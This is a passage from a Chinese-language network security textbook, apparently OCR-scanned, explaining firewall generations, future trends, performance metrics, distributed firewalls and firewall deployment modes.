赖 于 TCP 连接 ， 并 不 进行 任何 附加 的 包 处 理 和 过 滤 处 理 。 电 路 级 网 关 防 火 墙 首先 接收 客 
户 端 发 出 的 TCP 连接 请 求 ， 如 果 认 证 通过 ， 就 可 以 代表 该 客户 端 向 服务 器 建立 一 个 全 新 
的 TCP 连接 ， 如 果 建 立成 功 ， 电 路 级 网 关 就 可 以 简单 地 在 两 个 连接 之 间 传 递 数据 ， 因 此 
电路 级 网 关 仅 仅 是 一 种 连接 代理 ， 它 通过 在 传输 层 建立 起 来 的 回路 完成 对 数据 包 的 转发 和 
隔离 内 外 网 的 功能 ， 如 图 7-5 所 示 。 


内 部 网络 。 ， T- | 外 部 网 络 
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图 7-5 电路 层 防火 墙 基本 架构 示意 


从 图 7-5 中 可 以 看 出 ， 在 设 有 电路 层 防火 墙 的 网 络 中 ， 所 有 输出 数据 包 都 好 像 是 由 防 
火 墙 发 出 的 ， 避 免 了 直接 在 “受信 网 络 ” 和 “不 受信 网 络 ” 之 间 建 立 连接 ， 从 而 屏蔽 了 内 
网 主机 的 信息 ， 达 到 了 内 外 网 隔离 的 目的 ， 这 样 黑客 就 不 易 采 用 伪造 地 址 的 方法 来 达到 其 
骗 防 火 墙 的 目的 了 ， 另 外 ， 为 了 实现 这 种 地 址 上 的 转换 ， 电 路 层 防 火 墙 需要 在 内 网 主机 的 
源 地 址 和 转换 后 的 网 络 地 址 之 间 建 立 映射 关系 ， 以 便 形 成 传输 回路 ， 这 个 功能 通过 在 防火 
墙 上 运行 的 一 个 叫做 NAT 地 址 转换 进程 来 实现 。 
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3) ”第 三 代 防火 墙 应 用 层 代 理 防 火 墙 

继 电 路 层 防火 墙 之 后 ， 上 个 世纪 90 年 代 初 在 电路 层 防 火 墙 的 基础 上 很 快 发 展 出 了 第 
三 代 防 火 墙 ， 即 应 用 层 代理 防火 墙 。 应 用 层 代理 防火 墙 除 具 有 电路 层 网 关 的 所 有 优点 外 ， 
还 提供 了 一 个 重要 的 安全 和 管理 功能 : 代理 服务 器 。 代 理 服 务 器 是 设置 在 防火 墙 系统 中 的 
一 种 应 用 级 程序 ， 这 种 代理 功能 允许 管理 员 对 网 络 应 用 程序 或 对 一 个 应 用 的 特定 功能 进行 
安全 控制 ， 同 时 代理 服务 还 具有 较 强 的 数据 流 监 控 、 过 滤 、 记 录 和 报告 等 功能 。 应 用 代理 
网 关 防 火 墙 彻底 隔断 内 网 与 外 网 的 直接 通信 ， 所 有 通信 都 必须 经 应 用 层 代 理 软件 转发 ， 且 
应 用 层 的 协议 会 话 过 程 必须 符合 代理 的 安全 策略 要 求 ， 如 图 7-6 所 示 。 应 用 代理 网 关 的 优 
点 是 可 以 检查 应 用 层 、 传 输 层 和 网 络 层 的 协议 特征 ， 对 数据 包 的 检测 能 力 比较 强 ， 因 此 从 
设计 原理 和 设计 结构 上 比 包 过 滤 技 术 更 安全 。 但 由 于 每 个 应 用 都 要 求 单独 的 代理 进程 ， 并 
且 需 要 为 之 建立 连接 映射 ， 因 此 应 用 代理 防火 墙 的 处 理 延 迟 会 很 大 ， 内 网 用 户 的 正常 访问 
常常 得 不 到 及 时 响应 ， 而 且 难 以 支持 用 户 网 络 的 大 规模 并 发 连接 ， 另 外 ， 这 类 防火 墙 要 求 
系统 必须 预先 内 置 一 些 已 知 应 用 程序 的 代理 ， 这 使 得 一 些 新 出 现 的 应 用 在 代理 防火 墙 内 无 
法 识别 ， 因 此 它 不 能 很 好 地 适应 新 业务 的 出 现 。 


图 7-6 应 用 层 代理 防火 墙 的 工作 示意 图 


4) ”第 四 代 防 火 墙 : 动态 包 过 滤 防 火 墙 

第 四 代 防 火 墙 主要 是 基于 第 一 代 防 火 墙 的 包 过 滤 技 术 发 展 而 来 的 ，1992 年 USC 信息 
科学 院 的 BobBraden 开发 出 了 基于 动态 包 过 滤 技术 的 防火 墙 ， 这 也 是 目前 我 们 常见 的 状态 
检测 技术 的 雏形 。 早 期 的 动态 包 过 滤 是 基于 TCP 协议 三 次 握手 机 制 实现 的 一 种 状态 检测 
技术 ， 通 过 对 TCP 连接 状态 的 检查 ， 检 测 数据 包 的 动态 连接 过 程 是 否 合法 ， 如 图 7-7 所 
示 。 目 前 状态 检测 技术 不 仅 能 对 TCP 协议 的 状态 进行 检测 ， 也 能 对 UDP 等 协议 的 连接 状 
态 进 行 检测 。 动 态 包 过 滤 技 术 克 服 了 包 过 滤 防 火 墙 仅 检测 数据 包 的 IP 地 址 等 几 个 参数 ， 
而 不 关心 数据 包 连 接 状 态 变化 的 缺点 ， 在 防火 墙 的 核心 部 分 建立 起 状态 连接 表 ， 利 用 状态 
表 跟 踪 每 个 进入 网 络 数据 包 的 会 话 状态 ， 状 态 监测 不 仅 根据 包 过 滤 规 则 表 来 检查 数据 包 的 
合法 性 ， 更 考虑 了 数据 包 是 否 处 于 合法 的 会 话 状态 ， 因 此 提供 了 较 完 整 的 传输 层 控制 能 
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力 。 相 比 于 应 用 代理 网 关 防火 墙 ， 状 态 检 测 技术 采用 了 一 系列 优化 技术 ， 在 提高 安全 防范 
能 力 的 同时 也 改进 了 流量 处 理 速度 ， 从 而 使 防火 墙 的 性 能 得 到 了 大 幅 提升 ， 使 之 能 应 用 在 
各 类 网 络 环境 中 ， 尤 其 是 在 一 些 规则 复杂 的 大 型 网 络 上 。 


7-7 ”状态 检测 的 基本 流程 示意 图 


采用 动态 包 过 滤 技 术 的 防火 墙 对 通过 其 建立 的 每 一 个 连接 都 进行 跟踪 ， 并 且 根 据 需 要 
可 动态 地 在 过 滤 规 则 中 增加 或 更 改 策略 规则 ， 因 此 也 具有 很 好 的 管理 性 。 

5) ”第 五 代 防 火 墙 ， 自 适应 代理 技术 防火 墙 

第 五 代 防 火 墙 采 用 了 自 适 应 代理 技术 ， 它 结合 了 代理 网 关 防火 墙 安 全 性 和 包 过 滤 技 术 
的 高 速 性 等 优点 ， 是 商业 防火 墙 中 实现 的 一 种 革命 性 的 技术 ， 目 前 主流 防火 墙 采用 的 基本 
技术 模型 仍 是 以 自 适 应 代理 技术 为 主 ， 并 在 此 基础 上 进行 了 更 多 的 扩展 、 优 化 和 加 强 。 组 
成 这 种 类 型 防火 墙 的 基本 要 素 有 两 个 : 自 适 应 代理 服务 器 (Adaptive Proxy Server) 与 动态 包 
过 滤器 (Dynamic Packet filter)， 并 在 自 适 应 代理 服务 器 与 动态 包 过 滤器 之 间 存 在 一 个 控制 
通道 。 

自 适应 代理 技术 防火 墙 可 以 根据 用 户 定义 的 安全 策略 ， 灵 活 配 置 规则 ， 对 于 安全 性 要 
求 高 的 规则 ， 这 类 防火 墙 首先 在 应 用 层 进行 安全 检查 ， 保 证 实现 传统 代理 型 防火 墙 的 最 大 
安全 性 ， 而 一 旦 代理 网 关 明 确 了 会 话 的 所 有 细节 符合 安全 规则 要 求 后 ， 后 续 的 数据 包 就 可 
以 直接 经 过 速度 更 快 的 网 络 层 ， 通 过 基于 状态 检测 的 包 过 滤 技 术 来 实现 数据 的 安全 。 通 过 
这 样 的 自 适 应 技术 ， 使 得 第 五 代 防 火 墙 既 具有 和 传统 代理 型 防火 墙 一 样 的 安全 性 ， 又 具有 
了 传统 包 过 滤 型 防火 墙 的 高 速 性 ， 因 此 具有 非常 强 的 实用 性 。 

随 着 网 络 安全 问题 的 日 益 突出 ， 防 火 墙 技术 也 面临 着 一 些 新 的 挑战 ， 互 联网 业务 的 多 
样 性 、 无 线 网 络 的 普及 以 及 黑客 技术 的 革新 ， 都 推动 了 防火 墙 技术 的 进一步 发 展 。 防 火 墙 
的 未 来 发 展 趋势 ， 主 要 体现 在 以 下 几 个 方面 。 

1) “无 线 网 络 的 用 户 身份 认证 和 授权 

目前 已 有 很 多 防火 墙 厂商 把 在 802.1x 协议 标准 的 用 户 认证 及 其 服务 扩展 到 防火 墙 
中 ， 使 其 可 以 支持 基于 用 户 角 色 的 安全 策略 功能 ， 该 功能 在 无 线 网 络 应 用 中 非常 必要 。 具 
有 用 户 身 份 验证 的 防火 墙 通常 是 采用 应 用 级 网 关 技 术 实现 的 。 
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2) “多 级 过 滤 技 术 

多 级 过 滤 技术 也 叫 深度 过 滤 技 术 ， 是 指 防火 墙 采用 分 层 多 级 过 滤 措 施 ， 在 网 络 协议 栈 
的 各 个 分 层 进行 数据 包 识别 和 过 滤 ， 例 如 在 网 络 层 一 级 ， 可 以 过 滤 掉 所 有 的 源 路 由 分 组 和 
假冒 的 IP 源 地 址 ; 在 传输 层 一 级 ， 遵 循 过 滤 规 则 可 以 过 滤 掉 所 有 禁止 通行 的 协议 和 有 害 
数据 包 ; 在 应 用 层 一 级 ， 能 正确 识别 各 种 应 用 层 协 议 ， 如 P2P、 迅 雷 、FTP 等 ， 达 到 控制 
和 监测 Intemet 提供 的 通用 服务 的 目的 。 这 是 各 防火 墙 厂商 针对 以 上 各 种 已 有 防火 墙 技 术 
的 不 足 而 研发 的 一 种 综合 型 过 滤 技术 ， 它 可 以 弥补 以 上 各 种 单独 过 滤 技 术 的 不 足 。 多 级 过 
滤 技 术 在 分 层 设 计 上 接口 非常 清晰 ， 针 对 不 同 的 分 层 功 能 采用 不 同 的 识别 和 过 滤 技术 ， 并 
在 这 个 概念 上 扩充 了 很 多 内 容 ， 为 将 来 的 防火 墙 技 术 发 展 打下 了 基础 。 

3) ”病毒 防火 墙 技术 

目前 ， 很 多 厂商 将 防 病毒 功能 嵌入 进 防火 墙 系统 中 ， 使 之 能 有 效 阻止 来 自 外 部 网 络 的 
病毒 传播 ， 它 比 单纯 地 等 待 攻击 发 生 的 方式 更 加 积极 ， 拥 有 病毒 防护 功能 的 防火 墙 可 以 大 
大 减少 企业 及 个 人 用 户 的 损失 。 

4) ”防火 墙 硬件 体系 的 变化 

早期 防火 墙 的 硬件 体系 通常 都 是 基于 X86 架构 的 ， 这 种 架构 具有 灵活 的 软件 扩展 能 
力 ， 但 处 理 效率 低 ， 网 络 延 时 大 。 随 着 网 络 应 用 的 发 展 ， 特 别 是 多 媒体 业务 的 普及 ， 对 网 
络 带宽 提出 了 更 高 的 要 求 。 这 就 要 求 数据 包 穿 过 防火 墙 所 带 来 的 延迟 要 足够 小 。 为 了 满足 
这 种 需要 ， 一 些 防火 墙 制造 商 开 发 了 基于 ASIC 的 防火 墙 和 基于 网 络 处 理 器 的 防火 墙 。 这 
两 种 硬件 架构 ， 从 执行 速度 的 角度 来 看 ，ASIC 防火 墙 通过 ASIC 芯片 来 实现 一 些 专门 用 
于 处 理 数据 层面 任务 的 引擎 ， 因 此 具有 极 高 的 硬件 处 理 效率 ， 同 时 也 是 最 快 的 防火 墙 ， 基 
于 网 络 处 理 器 的 防火 墙 很 大 程度 上 仍 依赖 于 软件 的 性 能 ， 但 很 多 数据 层面 的 任务 引擎 也 是 
通过 硬件 来 实现 的 ， 因 此 具有 比 X86 架构 防火 墙 更 快 的 处 理 速度 和 更 好 的 性 能 ， 但 比 基 
于 ASIC 的 纯 硬 件 防 火 墙 性 能 略 低 。 从 软件 设计 的 角度 讲 ，ASIC 防火 墙 缺乏 可 编程 性 ， 
这 就 使 得 它 缺乏 足够 的 灵活 性 ， 从 而 跟 不 上 防火 墙 功能 的 快速 发 展 ， 而 基于 网 络 处 理 器 的 
防火 墙 更 具有 软件 扩展 的 灵活 性 。 

5) ”集中 式 管理 和 分 布 式 安全 

实现 防火 墙 的 集中 式 管理 以 及 分 布 式 和 分 层 的 安全 结构 是 未 来 防火 墙 发 展 的 一 大 趋 
势 ， 例 如 分 布 式 防火 墙 ， 这 类 防火 墙 的 集中 式 管理 有 利于 降低 管理 成 本 ， 保 证 大 型 网 络 中 
安全 策略 的 一 致 性 ， 其 分 布 式 的 安全 组 件 有 利于 网 络 安全 事件 的 快速 响应 和 快速 防御 ， 提 
高 防火 墙 的 处 理 效 率 ， 克 服 了 传统 防火 墙 单 点 防御 的 缺陷 。 关 于 分 布 式 防火 墙 ， 我 们 在 本 
节 的 最 后 还 要 介绍 。 

6) ”强大 的 审计 功能 和 日 志 自 动 分 析 功 能 

未 来 的 防火 墙 应 具有 强大 的 审计 功能 和 日 志 自 动 分 析 功 能 ， 从 而 能 及 早 地 发 现 网 络 中 
潜在 的 威胁 并 预防 攻击 的 发 生 ， 日 志 功 能 还 可 以 帮助 管理 员 有 效 地 发 现 系 统 中 存在 的 安全 
漏洞 ， 以 便 及 时 地 调整 安全 策略 。 

7) ”网 络 安全 产品 的 系统 化 

在 当今 的 互联 网 时 代 ， 单 纯 依 靠 现 有 的 防火 墙 技术 已 经 难以 满足 网 络 安全 的 需求 。 通 
过 建立 一 个 以 防火 墙 为 核心 的 安全 体系 ， 可 以 为 网 络 系统 部 署 多 道 安 全 防线 ， 这 些 安全 防 
线 在 统一 安全 策略 和 技术 体系 架构 下 ， 各 司 其 职 ， 应 对 不 同类 型 的 网 络 攻击 行为 ， 例 如 现 
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在 很 多 厂商 的 防火 墙 设备 都 可 以 和 入 侵 检测 设备 联合 在 一 起 使 用 ， 实 现 双方 的 联动 防御 。 
现在 各 个 安全 厂商 通常 的 做 法 有 两 种 :一 种 是 把 IDS、 病 毒 检测 、VPN 等 组 件 直接 嵌入 到 
防火 墙 中 ， 使 防火 墙 具 有 多 重 安全 和 控制 功能 ， 如 图 7-8 所 示 ; 另 一 种 方式 是 通过 统一 的 
技术 框架 和 通信 平台 ， 使 各 种 独立 的 安全 产品 通过 联动 的 方式 形成 一 个 整体 的 防御 体系 ， 
一 旦 发 现 安全 事件 ， 各 个 安全 产品 完成 自身 处 理 的 同时 ， 还 可 以 互通 消息 ， 联 合 防御 ， 如 
图 7-9 所 示 。 图 中 入 侵 检测 系统 发 现 网 络 扫描 后 ， 立 即 通知 防火 墙 ， 动 态 地 向 防火 墙 添加 
过 滤 规 则 ， 阻 断 扫 描 的 进行 。 从 实现 和 结构 上 看 ， 后 一 种 方式 价值 更 大 ， 一 方面 它 的 实现 
成 本 要 小 于 前 一 种 方式 ， 另 外 其 分 布 式 的 架构 不 易 形 成 网 络 瓶颈 。 


图 7-8 集成 多 种 安全 检测 和 防御 组 件 的 安全 网 关 防 火 墙 架构 示意 图 


发 起 攻击 


HogA HostB HostC HostD 


图 7-9 防火 墙 和 入 侵 检测 联动 的 示意 图 


7.1.3 影响 防火 墙 性 能 的 关键 指标 


一 般 的， 衡量 防火 墙 的 性 能 指标 主要 包括 吞吐 量 、 报 文 转发 率 、 最 大 并 发 连接 数 、 每 
秒 新 建 连接 数 、 平 均 时 延 、 丢 包 率 以 及 数据 包 分 类 性 能 等 。 

其 中 吞吐 量 是 指 防火 墙 在 没有 丢失 数据 包 的 情况 下 ， 以 全 双 工 方式 接收 和 发 送 64 字 
节 数 据 包 的 最 大 数据 传输 速率 ， 它 反映 了 防火 墙 的 数据 包 转 发 能 力 ， 因 此 该 指标 也 包含 了 
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对 报 文 转发 率 的 反映 ， 同 时 它 也 是 其 他 技术 指标 的 基础 ， 拥 有 高 吞吐 量 的 防火 墙 更 能 适应 
网 络 对 高 流量 的 要 求 ， 减 少 防火 墙 成 为 网 络 性 能 瓶颈 的 可 能 性 。 

防火 墙 的 最 大 并 发 连接 数 是 指 防火 墙 能 够 维持 的 最 大 连接 总 数 ， 而 每 秒 新 建 连接 数 反 
映 了 防火 墙 最 大 的 TCP 连接 速率 ， 它 直接 影响 了 防火 墙 对 连接 请 求 的 实时 反应 能 力 ， 所 
以 防火 墙 的 每 秒 新 建 连接 数 非常 重要 。 

防火 墙 的 延迟 指标 对 于 一 些 对 实时 非常 敏感 的 应 用 非常 重要 ， 如 网 络 电话 、 视 频 会 议 
等 ， 它 通常 通过 防火 墙 的 平均 时 延 指标 来 反映 。 平 均 时 延 是 指 从 测试 数据 帧 的 最 后 一 个 比 
特 进 入 被 测 设备 端口 开始 至 测试 数据 包 的 第 一 个 比特 从 被 测 设备 另 一 端口 离开 的 平均 时 间 
间隔 ， 通 常 所 有 帧 长 的 延迟 测试 都 是 分 别 在 50% 和 100%6 吞 吐 率 下 进行 的 。 

防火 墙 的 丢 包 率 测试 通常 是 指 防火 墙 在 不 同 传输 速率 下 丢失 数据 包 的 百分数 ， 目 的 在 
于 测试 防火 墙 在 超 负载 情况 下 的 性 能 。 这 对 于 对 数据 传输 的 丢 包 率 要 求 非常 苛刻 的 场合 ， 
如 金融、 证 券 、 电 子 商务 等 在 线 交易 行业 ， 是 非常 重要 的 。 因 此 丢 包 率 指标 对 于 像 银 行 系 
统 这 样 的 网 络 是 至 关 重 要 的 。 

除了 上 述 这 些 指标 ， 防 火 墙 还 有 一 个 指标 非常 重要 ， 那 就 是 数据 包 的 分 类 性 能 ， 因 为 
这 一 指标 直接 反映 了 防火 墙 在 处 理 新 的 网 络 流出 现时 的 处 理 速 度 ， 该 指标 体现 了 防火 墙 对 
每 个 新 出 现 的 网 络 流 中 第 一 个 数据 包 的 处 理 能 力 ， 具 体 地 说 ， 防 火 墙 通常 要 为 合法 流量 建 
立 连 接 ， 并 通过 快速 地 精确 匹配 进行 高 速 转发 ， 但 新 建 连接 都 需要 对 网 络 流 的 首 个 数据 包 
进行 分 类 ， 因 此 数据 包 分 类 性 能 直接 影响 了 新 建 连接 的 速率 ， 另 外 ， 对 网 络 中 的 非法 流量 
而 言 ， 防 火 墙 的 主要 工作 是 负责 拒绝 非法 流量 的 连接 建立 ， 所 以 非法 流量 的 数据 包 即 使 属 
于 同一 网 络 流 ， 也 需要 进行 分 类 ， 因 此 数据 包 分 类 性 能 也 反映 了 防火 墙 处 理 大 量 非法 流量 
的 能 力 。 


7.1.4 分 布 式 防火 墙 


当前 分 布 式 防火 墙 技术 已 悄然 兴起 ， 由 于 其 优越 的 安全 防护 体系 ， 使 之 更 符合 未 来 的 
发 展 趋势 。 


1. 分 布 式 防火 墙 的 产生 背景 


传统 防火 墙 通常 部 署 在 网 络 的 边界 ， 所 以 又 称 “ 边 界 防火 墙 ”。 但 随 着 网 络 各 种 新 应 
用 的 层出不穷 ， 黑 客 技术 的 不 断 翻 新 和 网 络 病毒 的 肆虐 ， 边 界 防 火 墙 已 经 明显 感觉 到 力 不 
从 心 ， 因 为 给 网 络 带 来 威胁 的 不 仅 是 外 部 网 络 ， 而 更 多 的 是 来 自 内 部 网 络 。 因 此 一 种 新 型 
的 防火 墙 技术 一 一 分 布 式 防火 墙 (Distributed Firewalls) 技 术 产 生 了 。 它 不 但 可 以 很 好 地 解决 
边界 防火 墙 的 不 足 ， 另 一 方面 也 保证 了 用 户 的 投资 不 会 很 高 。 分 布 式 防火 墙 是 一 种 主机 驻 
留 式 的 安全 系统 ， 它 是 以 主机 为 保护 对 象 ， 它 的 设计 理念 是 主机 以 外 的 任何 用 户 访问 都 是 
不 可 信任 的 ， 都 需要 进行 识别 和 过 滤 。 在 实际 应 用 中 ， 考 虑 到 安全 成 本 的 效益 ， 分 布 式 防 
火 墙 通常 只 用 于 保护 用 户 网 络 中 的 关键 结 点 服务 器 、 数 据 及 工作 站 免 受 非 法 入 侵 的 破坏 。 


2. 分 布 式 防火 墙 的 主要 特点 


分 布 式 防火 墙 是 一 个 完整 的 系统 ， 而 不 仅仅 是 一 个 单一 的 产品 ， 根 据 其 功能 划分 ， 它 
通常 至 少 包含 了 网 络 防 火 墙 、 主 机 防火 墙 和 集中 管理 模块 三 个 组 件 。 分 布 式 防火 墙 主要 具 
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有 以 下 特点 。 

1) ”主机 驻 留 方式 

分 布 式 防火 墙 的 最 主要 特点 之 一 就 是 采用 主机 驻 留 方 式 ， 它 对 分 布 式 防火 墙 体 系 结构 
的 突出 贡献 是 使 安全 策略 不 仅仅 停留 在 网 络 与 网 络 之 间 ， 而 是 把 安全 策略 推广 延伸 到 每 个 
网 络 末端 。 

2) ”内 核 守护 方式 

由 于 目前 操作 系统 自身 存在 很 多 安全 漏洞 ， 因 此 操作 系统 成 为 很 多 黑客 和 病毒 的 主要 
攻击 对 象 。 分 布 式 防火 墙 运行 在 主机 上 ， 并 将 主机 防火 墙 的 安全 引擎 嵌入 操作 系统 内 核 ， 
以 内 核 形 态 运行 ， 从 而 起 到 加 固 操作 系统 安全 的 效果 。 它 通过 直接 获取 网 卡 数据 ， 并 在 对 
所 有 数据 包 进行 安全 检查 后 再 将 数据 提交 给 操作 系统 ， 从 而 直接 参与 操作 系统 对 数据 通信 
的 处 理 ， 其 运行 机 制 是 分 布 式 防火 墙 的 关键 技术 之 一 。 但 这 种 技术 的 实现 也 存在 很 多 限制 
条 件 ， 其 中 与 操作 系统 厂商 的 技术 合作 是 实现 这 种 技术 商业 化 的 前 提 。 

3) ”统一 安全 策略 ， 便 于 集中 管理 

桌面 级 主机 防火 墙 与 个 人 防火 墙 相 比 ， 它 采用 的 是 集中 管理 方式 ， 它 的 安全 策略 由 整 
个 系统 的 管理 员 统 一 安排 和 设置 ， 除 了 对 该 桌面 机 起 到 保护 作用 外 ， 也 可 以 对 该 桌面 机 的 
对 外 访问 加 以 控制 ， 并 且 这 种 安全 机 制 是 桌面 机 的 使 用 者 不 可 见 和 不 可 改动 的 。 而 个 人 防 
火 墙 虽 然 也 可 以 保护 单一 主机 系统 ， 但 其 安全 策略 由 系统 使 用 者 自己 设置 ， 全 部 功能 和 管 
理 都 在 本 机 上 实现 ， 用 户 对 安全 的 认 知 程度 和 对 技术 的 熟悉 程度 ， 直 接 影响 了 防火 墙 的 安 
全 防护 能 力 。 因 此 基于 桌面 应 用 的 主机 防火 墙 是 面向 企业 级 客户 的 ， 它 与 分 布 式 防 火 墙 的 
其 他 产品 共同 构成 一 个 整体 的 安全 应 用 方案 ， 并 通过 一 个 安全 的 策略 中 心 统一 管理 ， 所 以 
他 在 一 定 程度 上 面 对 的 是 整个 网 络 ， 只 是 它 将 整个 系统 的 安全 检查 机 制 分 散 部 署 在 网 络 的 
各 个 末端 。 

4) ”适用 于 服务 器 托管 

互联 网 和 电子 商务 的 发 展 促进 了 互联 网 数据 中 心 (IDC) 的 迅速 崛起 ， 其 主要 业务 之 一 
就 是 服务 器 托管 。 分 布 式 防火 墙 技术 非常 适合 服务 器 托管 用 户 。 


3. 分 布 式 防火 墙 的 主要 优势 


分 布 式 防火 墙 的 优势 主要 体现 在 以 下 几 个 方面 。 

(1) 增强 了 系统 的 安全 性 。 

分 布 式 防火 墙 的 多 层次 、 立 体 化 安全 机 制 ， 增 强 了 针对 主机 的 入 侵 检测 和 防护 能 力 ， 
加 强 了 对 来 自 内 部 网 络 攻击 的 防范 ， 便 于 实施 全 方位 的 安全 策略 。 

(2) 提高 了 整个 网 络 的 安全 处 理 能 力 ， 消 除了 边界 防火 墙 结构 性 的 瓶颈 问题 。 

传统 防火 墙 通常 部 署 在 网 络 边界 ， 是 一 个 单一 的 接 入 控制 点 ， 这 对 网 络 的 性 能 和 可 靠 
性 都 有 不 利 的 影响 。 而 分 布 式 防火 墙 从 根本 上 去 除了 单一 的 接 入 点 ， 使 这 一 问题 迎 刃 而 
解 ， 从 而 在 保障 网 络 安全 的 前 提 下 大 大 提高 了 网 络 运转 效率 。 

(3) 便于 整个 网 络 的 安全 扩展 。 

分 布 式 防火 墙 具 有 统一 集中 管理 能 力 ， 而 它 的 处 理 负荷 却 被 分 散在 网 络 当 中 ， 因 此 分 
布 式 防火 墙 为 整个 网 络 安全 系统 的 扩充 提供 了 无 限 的 空间 。 
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(4) 便于 控制 主机 安全 策略 。 

传统 防火 墙 大 多 缺乏 对 网 络 末端 主机 的 深入 检测 ， 通 常 只 能 根据 数据 包 的 外 在 特性 来 
进行 过 滤 控 制 。 分 布 式 防火 墙 由 主机 来 实施 策略 控制 ， 这 使 得 主机 对 自身 运行 的 业务 有 着 
足够 的 了 解 ， 所 以 分 布 式 防火 墙 便于 控制 主机 安全 策略 的 深度 实施 。 

(5) 分 布 式 防火 墙 的 应 用 更 广泛 。 

分 布 式 防火 墙 最 重要 的 优势 之 一 在 于 它 所 保护 的 网 络 是 一 种 逻辑 上 的 内 部 网 络 主机 ， 
这 与 VPN 的 发 展 不 谋 而 合 ， 配 合 VPN 技术 ， 分 布 式 防火 墙 能 为 当前 互联 网 用 户 提供 更 广 
泛 的 应 用 。 


4. 分 布 式 防火 墙 的 主要 功能 


分 布 式 防火 墙 的 主要 功能 体现 在 以 下 几 个 方面 。 

1) ”Internet 访问 控制 

分 布 式 防火 墙 通 过 主机 防火 墙 ， 依 据 主机 名 字 、 设 备 指纹 等 属性 ， 控 制 该 主机 或 工作 
站 组 在 指定 的 时 间 段 内 是 否 允 许 或 禁止 访问 规则 中 所 规定 的 Intemet 服务 器 。 

2) ”应 用 访问 控制 

通过 对 基于 源 地 址 、 目 标 地 址 、 端 口 、 协 议 的 逐 层 包 过 滤 与 入 侵 监测 的 结合 ， 控 制 来 
自 局 域 网 /Internet 的 应 用 服务 请 求 ， 如 SQL 数据 库 访 问 、 目 录 访 问 等 。 

3) ”网 络 状态 监控 

实时 动态 报告 当前 网 络 中 所 有 的 用 户 登 录 、Internet 访问 、 内 网 访问 、 网 络 入 侵 事 件 
等 信息 。 

4) ”抵御 网 络 攻击 

抵御 包括 Smurf 拒绝 服务 攻击 、ARP 欺骗 式 攻击 、Ping 攻击 、Trojan 木马 攻击 等 在 
内 的 各 种 来 自 网 络 内 部 以 及 来 自 ntemet 的 黑客 攻击 手段 。 

5) 具有 日 志 功 能 

具有 对 工作 站 协议 规则 日 志 、 用 户 登 录 事 件 日 志 、 用 户 Intemet 访问 日 志 、 指 纹 验 证 
规则 日 志 、 入 侵 检测 规则 日 志 的 记录 与 查询 分 析 功能 。 


7.2 防火墙 部 署 类 型 


防火 墙 在 实际 网 络 环境 中 部 署 时 ， 一 般 是 利用 防火 墙 将 网 络 分 为 三 个 安全 区 域 ， 即 内 
部 网 络 、 外 部 网 络 和 DMZ 区 。 其 中 内 部 网 络 通常 定义 为 最 高 安全 级 ， 外 部 网 络 通常 定义 
为 最 低 安全 级 ， 而 DMZ 区 通常 为 服务 器 网 段 ， 它 的 安全 级 介 于 内 部 网 络 和 外 部 网 络 之 
间 。 在 防火 墙 处 理 数据 通信 时 ， 遵 循 高 安全 级 可 任意 访问 低 安全 级 网 络 域 的 原则 ， 因 此 内 
部 网 络 可 以 自由 访问 外 部 网 络 和 DMZ 区 ，DMZ 区 可 以 自由 访问 外 部 网 络 ， 而 外 部 网 络 
必须 符合 安全 策略 规则 才能 访问 DMZ 区 和 内 部 网 络 ， 这 种 规则 的 体现 典型 的 就 是 思科 的 
早期 PIX 防火 墙 。 由 于 目前 内 网 安全 的 复杂 性 ，DMZ 区 的 安全 级 别 被 大 大 提高 了 ， 默 认 
情况 下 DMZ 区 的 访问 无 论 是 针对 内 网 还 是 外 网 ， 都 需要 进行 安全 规则 的 检查 。 

防火 墙 部 署 时 ， 一 般 需 要 考虑 三 个 方面 的 问题 : 防火 墙 的 安全 策略 、 防 火 墙 的 工作 模 
式 及 其 拓扑 类 型 。 本 节 我 们 重点 对 防火 墙 的 工作 模式 和 拓扑 类 型 进行 说 明 。 
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1. 防火 墙 工作 模式 


防火 墙 常见 的 部 署 类 型 从 工作 模式 的 角度 可 以 分 为 路 由 模式 、 透 明 模 式 、NAT 模式 
和 混合 模式 。 

1) ”路 由 模式 

传统 防火 墙 一 般 工 作 于 路 由 模式 ， 在 这 种 模式 下 ， 防 火 墙 的 接口 配置 了 IP 地 址 ， 各 
接口 所 在 的 安全 区 域 是 一 个 三 层 网 络 ， 即 不 同 接口 连接 的 网 络 域 属于 不 同 的 子 网 。 当 报 文 
在 三 层 区 域 的 接口 间 进 行 转 发 时 ， 防 火 墙根 据 报 文 的 IP 地 址 来 查找 路 由 表 ， 从 而 实现 其 
路 由 的 功能 。 与 路 由 器 不 同 的 是 ， 防 火 墙 中 IP 报 文 在 路 由 前 ， 需 要 送 到 上 层 模 块 进行 相 
关 检 测 和 过 滤 等 处 理 ， 通 过 检查 会 话 表 或 安全 规则 ， 确 定 是 否 允 许 该 报 文通 过 ; 此 外 还 要 
完成 其 他 防 攻 击 检测 。 工 作 在 路 由 模式 下 的 防火 墙 可 以 支持 ACL 规则 检查 、ASPF 状态 检 
测 、 防 攻击 检查 、 流 量 监控 等 功能 。 但 工作 在 路 由 模式 下 的 防火 墙 也 有 两 个 主要 的 局 限 
性 : 一 是 防火 墙 各 接口 不 能 处 于 同一 网 段 ， 否 则 它们 之 间 无 法 通信 ， 二 是 如 果 用 户 试图 在 
一 个 已 经 建成 的 网 络 中 添加 一 个 工作 在 路 由 模式 下 的 防火 墙 时 ， 需 要 调整 网 络 设置 ， 保 证 
与 防火 墙 所 接 的 主机 或 网 络 设备 的 网 关 指向 该 防火 墙 。 

2) ”透明 模式 

防火 墙 的 透明 模式 是 一 种 桥接 工作 方式 ， 工 作 在 透明 模式 下 的 防火 墙 可 以 部 署 在 同一 
个 网 段 内 ， 因 此 可 以 不 用 修改 周边 网 络 设备 的 配置 ， 就 能 将 其 加 入 到 一 个 网 段 中 。 透 明 模 
式 下 ， 防 火 墙 接口 所 在 的 安全 区 域 是 一 个 二 层 网 络 ， 当 报 文 在 二 层 区 域 的 接口 间 进 行 转发 
时 ， 可 以 根据 报 文 的 MAC 地 址 来 寻找 转发 接口 ， 但 与 网 桥 不 同 的 是 ， 流 经 防火 墙 的 报 文 
在 转发 前 需要 送 到 上 层 模块 进行 相关 的 识别 和 过 滤 等 处 理 ， 和 路 由 模式 一 样 ， 透 明 模式 的 
防火 墙 也 可 以 支持 ACL 规则 检查 、ASPF 状态 检测 、 防 攻击 检查 、 流 量 监控 等 功能 。 透 明 
模式 最 大 的 优点 是 无 需 对 连接 的 网 络 和 设备 进行 特别 的 配置 。 

3) NAT 模式 

防火 墙 的 NAT 模式 并 不 是 一 个 独立 的 工作 模式 ， 它 一 般 工 作 在 路 由 模式 或 混合 模式 
